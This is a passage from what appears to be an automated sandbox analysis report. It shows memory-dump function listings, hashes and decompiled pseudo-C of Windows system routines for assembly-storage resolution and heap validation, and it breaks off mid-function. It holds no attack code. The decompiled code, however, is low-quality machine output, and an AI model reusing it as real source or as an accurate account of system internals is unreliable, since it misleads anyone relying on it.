                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008EFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0091C5F0, Relevance: 14.2, Strings: 11, Instructions: 424COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 55%
                                                			E0091C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v544;
				char _v1064;
				char _v1068;
				char _v1069;
				signed short* _v1076;
				signed short _v1080;
				intOrPtr _v1084;
				signed short _v1086;
				char _v1088;
				char _v1092;
				signed short _v1096;
				char _v1100;
				char* _v1104;
				short _v1106;
				char _v1108;
				char _v1111;
				char _v1112;
				signed short _v1116;
				char _v1120;
				intOrPtr _v1124;
				short _v1126;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				char _v1144;
				intOrPtr _v1148;
				short _v1150;
				char _v1152;
				char* _v1156;
				short _v1158;
				char _v1160;
				intOrPtr _v1164;
				intOrPtr _v1172;
				intOrPtr _v1176;
				char _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				char* _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t173;
				intOrPtr _t175;
				void* _t191;
				void* _t193;
				intOrPtr _t200;
				char _t215;
				void* _t226;
				signed short _t250;
				void* _t284;
				signed short _t286;
				unsigned int _t292;
				short _t294;
				signed int _t295;
				void* _t296;

				_t173 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t173 ^ _t295;
				_t175 = _a4;
				_t272 = _a8;
				_v1132 = _a16;
				_v1140 = _a20;
				_v1160 = 0;
				_v1158 = 0x208;
				_v1156 =  &_v1064;
				_t282 = 0;
				_t288 = 0;
				_t286 = _a12;
				_v1164 = _t175;
				_v1069 = 0;
				_v1068 = 0;
				_v1136 = 0;
				_v1088 = 0;
				_v1086 = 0;
				_v1084 = 0;
				_v1128 = 0;
				_v1126 = 0;
				_v1124 = 0;
				_v1144 = 0;
				if(_t175 == 0) {
					_t282 = 0;
					L66:
					_push(_t282);
					_push(_t286);
					_push(_t272);
					_push(_t175);
					E00943F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
					_t288 = 0xc000000d;
					L18:
					if(_v1069 == 0) {
						L20:
						if(_v1084 != 0) {
							 *0x8fe6f0(_v1084);
						}
						if(_v1068 != 0) {
							E008EF9F0(_v1068);
						}
						if(_v1136 != 0) {
							E008FE025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
						}
						L23:
						return E008FE1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
					}
					L19:
					_v1120 = _v1144;
					_v1132(4,  &_v1120, _v1140);
					goto L20;
				}
				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
					_t282 =  *((intOrPtr*)(_t175 + 4));
					goto L66;
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
						goto L23;
					}
					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
					_t291 =  *((intOrPtr*)(_t191 + 0x50));
					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
						_push(_t272);
						E00943F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
						L39:
						_t288 = 0xc0000106;
						goto L20;
					}
					if(( *(_t191 + 4) & 0x00000010) != 0) {
						L27:
						_v1076 =  &_v1160;
						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
						_v1080 = _t286;
						if(_t286 == 0) {
							_t288 = 0xc00000e5;
							goto L23;
						}
						_t193 = E00908342(_t286, 0x5c);
						_pop(_t272);
						if(_t193 == 0) {
							_t288 = 0xc00000e5;
							goto L20;
						}
						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
						if(_t286 > 0x208) {
							if(_t286 > 0xfffe) {
								goto L39;
							}
							_v1086 = _t286;
							_t200 =  *0x8fe6f4(_t286 & 0x0000ffff);
							_v1084 = _t200;
							if(_t200 != 0) {
								_v1076 =  &_v1088;
								goto L30;
							}
							_t288 = 0xc0000017;
							goto L20;
						}
						L30:
						_t292 = _t286 & 0x0000ffff;
						E008F2340(_v1076[2], _v1080, _t292 - 2);
						_t272 = 0;
						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
						_t296 = _t296 + 0xc;
						 *_v1076 = _t286;
						L15:
						if(_v1068 == 0) {
							if(E0090DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
								E00943F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
								_t288 = 0xc000003a;
								goto L18;
							}
							_v1136 = _v1124;
							_t215 = _v1180;
							if(_t215 != 0) {
								_v1128 = _t215;
								_v1124 = _v1176;
							} else {
								_v1172 = 0;
							}
							_v1200 = _v1172;
							_push(0x21);
							_v1196 =  &_v1128;
							_push(3);
							_push( &_v1212);
							_push( &_v1204);
							_push(0x100020);
							_v1204 = 0x18;
							_v1192 = 0x40;
							_v1188 = 0;
							_v1184 = 0;
							_t288 = E008EFD74( &_v1068);
							E0090A331( &_v1180, _t272,  &_v1180);
							if(_t288 >= 0) {
								goto L16;
							} else {
								_push(_t288);
								E00943F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
								goto L18;
							}
						}
						L16:
						_t226 = E0091CC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							E00943F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E0091D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = E0091CC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							E00943F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							E00943F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E008EF9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E0091D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									E00943F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}
































































                                                0x0091c5fb
                                                0x0091c602
                                                0x0091c608
                                                0x0091c60b
                                                0x0091c60e
                                                0x0091c617
                                                0x0091c61f
                                                0x0091c62e
                                                0x0091c63c
                                                0x0091c642
                                                0x0091c644
                                                0x0091c647
                                                0x0091c64a
                                                0x0091c650
                                                0x0091c656
                                                0x0091c65c
                                                0x0091c662
                                                0x0091c669
                                                0x0091c670
                                                0x0091c676
                                                0x0091c67d
                                                0x0091c684
                                                0x0091c68a
                                                0x0091c692
                                                0x0095557b
                                                0x0095557d
                                                0x0095557d
                                                0x0095557e
                                                0x0095557f
                                                0x00955580
                                                0x0095558e
                                                0x00955596
                                                0x0091c874
                                                0x0091c87a
                                                0x0091c89d
                                                0x0091c8a3
                                                0x009555a6
                                                0x009555a6
                                                0x0091c8af
                                                0x009555b7
                                                0x009555b7
                                                0x0091c8bb
                                                0x009322ee
                                                0x009322ee
                                                0x0091c8c1
                                                0x0091c8d1
                                                0x0091c8d1
                                                0x0091c87c
                                                0x0091c888
                                                0x0091c897
                                                0x00000000
                                                0x0091c897
                                                0x0091c69a
                                                0x009322f8
                                                0x00000000
                                                0x0091c6b2
                                                0x0091c6b8
                                                0x00000000
                                                0x00000000
                                                0x0091c6c6
                                                0x0091c6d4
                                                0x0091c6d6
                                                0x0091c6d9
                                                0x0091c6e1
                                                0x00955384
                                                0x0095538e
                                                0x00955396
                                                0x00955396
                                                0x00000000
                                                0x00955396
                                                0x0091c6eb
                                                0x00932196
                                                0x0093219c
                                                0x009321a5
                                                0x009321a7
                                                0x009321ad
                                                0x009553a0
                                                0x00000000
                                                0x009553a0
                                                0x009321b6
                                                0x009321bc
                                                0x009321bf
                                                0x009553aa
                                                0x00000000
                                                0x009553aa
                                                0x009321cd
                                                0x009321d8
                                                0x009553bc
                                                0x00000000
                                                0x00000000
                                                0x009553c2
                                                0x009553c9
                                                0x009553cf
                                                0x009553d7
                                                0x009553e9
                                                0x00000000
                                                0x009553e9
                                                0x009553d9
                                                0x00000000
                                                0x009553d9
                                                0x009321de
                                                0x009321de
                                                0x009321f4
                                                0x00932204
                                                0x00932206
                                                0x00932211
                                                0x00932217
                                                0x0091c841
                                                0x0091c847
                                                0x0093223e
                                                0x00955405
                                                0x0095540d
                                                0x00000000
                                                0x0095540d
                                                0x0093224a
                                                0x00932250
                                                0x00932259
                                                0x0095552f
                                                0x0095553b
                                                0x0093225f
                                                0x0093225f
                                                0x0093225f
                                                0x0093226b
                                                0x00932271
                                                0x00932279
                                                0x0093227f
                                                0x00932287
                                                0x0093228e
                                                0x0093228f
                                                0x0093229b
                                                0x009322a5
                                                0x009322af
                                                0x009322b5
                                                0x009322c0
                                                0x009322c9
                                                0x009322d0
                                                0x00000000
                                                0x009322d6
                                                0x0095554c
                                                0x00955558
                                                0x00000000
                                                0x0095555d
                                                0x009322d0
                                                0x0091c84d
                                                0x0091c863
                                                0x0091c868
                                                0x0091c86c
                                                0x0095556e
                                                0x0091c872
                                                0x0091c872
                                                0x0091c872
                                                0x00000000
                                                0x0091c86c
                                                0x0091c6f7
                                                0x0091c6fd
                                                0x0091c701
                                                0x0091c708
                                                0x0091c714
                                                0x0091c71c
                                                0x0091c728
                                                0x0091c735
                                                0x0091c744
                                                0x0091c74a
                                                0x0091c750
                                                0x0091c756
                                                0x0091c75c
                                                0x0091c762
                                                0x0091c768
                                                0x0091c774
                                                0x00955417
                                                0x00000000
                                                0x00955417
                                                0x0091c780
                                                0x00955451
                                                0x00955455
                                                0x0095548e
                                                0x00955492
                                                0x0095549d
                                                0x00000000
                                                0x0095549d
                                                0x00955494
                                                0x00955495
                                                0x00955496
                                                0x00955464
                                                0x00955464
                                                0x00955465
                                                0x00955467
                                                0x00000000
                                                0x0095546c
                                                0x00955457
                                                0x0095545e
                                                0x0095545f
                                                0x00000000
                                                0x0095545f
                                                0x0091c78c
                                                0x0091c792
                                                0x0091c798
                                                0x0091c79a
                                                0x0091c7a0
                                                0x0091c7a9
                                                0x0091c835
                                                0x0091c83b
                                                0x009554df
                                                0x009554df
                                                0x009554ef
                                                0x009554f7
                                                0x00000000
                                                0x009554f7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c7af
                                                0x0091c7af
                                                0x0091c7bb
                                                0x0091c7c3
                                                0x0091c7cf
                                                0x0091c7dc
                                                0x0091c7eb
                                                0x0091c7f1
                                                0x0091c7f7
                                                0x0091c7fd
                                                0x0091c809
                                                0x00000000
                                                0x00000000
                                                0x0091c815
                                                0x009554ab
                                                0x00000000
                                                0x00000000
                                                0x009554ad
                                                0x009554b0
                                                0x009554b0
                                                0x0091c822
                                                0x0091d03e
                                                0x009554c1
                                                0x009554c6
                                                0x009554c6
                                                0x0091d074
                                                0x0091d078
                                                0x00000000
                                                0x0091d07e
                                                0x009554d7
                                                0x00000000
                                                0x009554dd
                                                0x0095550b
                                                0x00955512
                                                0x00955522
                                                0x00000000
                                                0x00955527
                                                0x00000000
                                                0x009554d7
                                                0x0091d078
                                                0x0091c828
                                                0x0091c828
                                                0x0091c82f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c82f
                                                0x00955501
                                                0x00000000
                                                0x00955501

                                                Strings
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 0095545F
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00955550
                                                • @, xrefs: 009322A5
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00955386
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 00955581
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00955496
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0095551A
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00955586
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00955566
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 009553FD
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 009554E7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: e0c8ddddbb30053f33699fea93cb68005d0615ffccb630b4e468fba29e088005
                                                • Instruction ID: 7531a5c3a9f8021c0d4d2057ae006d6d2a2d8407d024d0e70404e32a9853707c
                                                • Opcode Fuzzy Hash: e0c8ddddbb30053f33699fea93cb68005d0615ffccb630b4e468fba29e088005
                                                • Instruction Fuzzy Hash: 7A023DF1E406289FDB20DF54CC80BEAB7B9AF55304F4541EAA609A7212E6349FC4CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0099FDDD, Relevance: 12.0, Strings: 9, Instructions: 799COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0099FDDD(signed int _a4, signed int _a8, intOrPtr* _a16, signed int* _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t339;
				intOrPtr _t361;
				signed int _t365;
				signed short _t377;
				signed char _t380;
				signed int* _t382;
				signed char _t383;
				signed int _t384;
				intOrPtr _t386;
				unsigned int _t401;
				signed int _t402;
				intOrPtr _t409;
				intOrPtr _t423;
				signed int _t450;
				intOrPtr _t452;
				intOrPtr* _t463;
				signed int _t465;
				signed int* _t466;
				signed int _t467;
				intOrPtr _t468;
				signed short _t469;
				signed int _t471;
				signed int _t472;
				signed int _t475;
				signed short* _t486;
				signed short _t487;
				signed int* _t489;
				signed int _t490;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t511;
				signed short _t513;
				signed short _t514;
				signed int _t515;
				signed int* _t519;
				signed int _t523;
				signed int _t532;
				signed int _t534;
				signed int* _t535;
				signed int _t537;
				void* _t539;
				signed int _t549;
				signed int _t551;
				intOrPtr _t557;
				intOrPtr _t561;
				signed int _t570;
				intOrPtr* _t582;
				signed int _t583;
				signed int* _t584;
				void* _t585;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t592;
				signed int* _t594;
				signed short _t595;
				signed short _t597;
				signed int _t604;
				signed int _t605;
				signed int _t607;
				signed short _t609;
				signed short _t611;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				intOrPtr _t626;
				signed int* _t627;
				intOrPtr _t628;
				signed int _t630;
				signed int* _t632;
				signed int _t633;
				signed int _t634;
				signed int _t636;
				signed int _t638;
				signed int* _t642;
				signed short _t643;
				signed short _t645;
				signed int _t646;
				void* _t650;
				signed int _t652;
				signed int _t654;
				signed int* _t656;
				signed short _t664;
				signed short _t667;
				intOrPtr _t668;
				intOrPtr _t669;
				signed int _t670;
				signed int _t671;
				void* _t690;

				_t671 = _a8;
				_t339 = 0;
				_v32 = 0;
				_v36 = 0;
				_v24 = 0;
				if(_t671 >=  *((intOrPtr*)(_t671 + 0x28))) {
					L176:
					_t668 = _v32;
					__eflags =  *((intOrPtr*)(_t671 + 0x2c)) - _t668;
					if( *((intOrPtr*)(_t671 + 0x2c)) == _t668) {
						_t669 = _v36;
						__eflags =  *((intOrPtr*)(_t671 + 0x30)) - _t669;
						if( *((intOrPtr*)(_t671 + 0x30)) == _t669) {
							goto L203;
						}
						_t557 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *((intOrPtr*)(_t557 + 0xc)) - _t339;
						if( *((intOrPtr*)(_t557 + 0xc)) == _t339) {
							_push("HEAP: ");
							E0094373B();
						} else {
							E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t669);
						_push( *((intOrPtr*)(_t671 + 0x30)));
						_push(_t671);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L211:
						E0094373B();
						goto L186;
					}
					_t561 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					__eflags =  *((intOrPtr*)(_t561 + 0xc)) - _t339;
					if( *((intOrPtr*)(_t561 + 0xc)) == _t339) {
						_push("HEAP: ");
						E0094373B();
					} else {
						E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t668);
					_push( *((intOrPtr*)(_t671 + 0x2c)));
					_push(_t671);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L211;
				} else {
					_t670 = _a4;
					do {
						_t532 = 0;
						 *_a24 = _t671;
						if( *(_t670 + 0x4c) != 0) {
							 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							_t679 =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
							if( *(_t671 + 3) != ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671)) {
								_push(0);
								_push(_t671);
								_push(_t670);
								E0099F8EE(0, _t670, _t671, _t679);
							}
						}
						if(_v24 != ( *(_t671 + 4) ^  *(_t670 + 0x54))) {
							_t361 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *((intOrPtr*)(_t361 + 0xc)) - _t532;
							if( *((intOrPtr*)(_t361 + 0xc)) == _t532) {
								_push("HEAP: ");
								E0094373B();
							} else {
								E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v24 & 0x0000ffff);
							_t365 =  *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff;
							__eflags = _t365;
							_push(_t365);
							E0094373B("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t671);
							L183:
							_t690 =  *(_t670 + 0x4c) - _t532;
							L184:
							if(_t690 != 0) {
								 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
								 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							}
							L186:
							return 0;
						}
						_t377 =  *_t671 & 0x0000ffff;
						_v24 = _t377 & 0x0000ffff;
						_t568 = _t377 & 0x0000ffff;
						_a4 = _t568 << 3;
						_t380 =  *(_t671 + 2);
						if((_t380 & 0x00000001) == 0) {
							__eflags =  *(_t670 + 0x40) & 0x00000040;
							if(( *(_t670 + 0x40) & 0x00000040) == 0) {
								L154:
								 *_a16 =  *_a16 + 1;
								_t382 = _a20;
								 *_t382 =  *_t382 + ( *_t671 & 0x0000ffff);
								__eflags =  *_t382;
								L155:
								_t383 =  *(_t671 + 6);
								__eflags = _t383;
								if(_t383 == 0) {
									_t384 = _t670;
								} else {
									_t384 = (_t671 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10) + 0x10000;
								}
								_t570 = _a8;
								__eflags = _t384 - _t570;
								if(_t384 != _t570) {
									_t386 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t386 + 0xc)) - _t532;
									if( *((intOrPtr*)(_t386 + 0xc)) == _t532) {
										_push("HEAP: ");
										E0094373B();
									} else {
										E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *(_t671 + 6) & 0x000000ff);
									_push(_t671);
									_push("Heap block at %p has incorrect segment offset (%x)\n");
									goto L195;
								} else {
									__eflags =  *((char*)(_t671 + 7)) - 3;
									if( *((char*)(_t671 + 7)) != 3) {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
